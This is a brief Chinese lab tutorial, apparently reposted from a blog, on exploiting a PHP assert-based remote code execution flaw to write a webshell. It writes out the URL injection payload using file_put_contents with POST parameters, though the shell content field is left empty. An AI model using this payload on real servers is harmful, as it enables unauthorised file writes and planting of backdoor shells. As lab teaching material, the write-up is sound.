实验原理
利用远程命令执行漏洞可以执行写文件的代码,生成新的脚本文件。
靶机:
在URL后拼接"?a=var_dump(file_put_contents($_POST[1],$_POST[2]))",访问http://ip/os/assert.php?a=var_dump(file_put_contents($_POST[1],$_POST[2])),并发送post数据:1=info.php&2=,成功执行代码(Warning警告,但是并不影响)
写入一句话木马
远程命令执行漏洞利用之写shell
2025/3/12 22:07:41
来源:https://blog.csdn.net/weixin_67840381/article/details/140890102
浏览:
次
关键词:远程命令执行漏洞利用之写shell
版权声明:
本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。
我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com
